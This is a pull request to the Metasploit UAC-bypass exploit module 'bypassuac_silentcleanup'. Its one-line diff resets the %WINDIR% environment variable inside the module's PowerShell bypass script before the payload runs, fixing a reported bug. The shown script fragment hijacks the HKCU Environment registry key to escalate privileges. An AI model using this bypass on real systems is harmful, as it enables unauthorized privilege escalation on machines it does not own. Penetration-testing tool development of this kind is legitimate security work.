### PR TITLE
bypassuac_silentcleanup: cleanup %WINDIR% env var before calling powershell payload

### DIFF
--- a/modules/exploits/windows/local/bypassuac_silentcleanup.rb
+++ b/modules/exploits/windows/local/bypassuac_silentcleanup.rb
@@ -50,6 +50,7 @@ class MetasploitModule < Msf::Exploit::Local
   def get_bypass_script(cmd)
     scr = %Q{
       if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) {
+        $env:windir = [System.Environment]::GetEnvironmentVariable("windir", "machine")
         #{cmd}
       } else {
           $registryPath = "HKCU:\\Environment"


### PR DESCRIPTION
See fixed issue #12665 for details

Child process inherits env variables from parent. So if we reset `WINDIR`, by using its original value stored at machine level, it is fixed.
I tested before & after.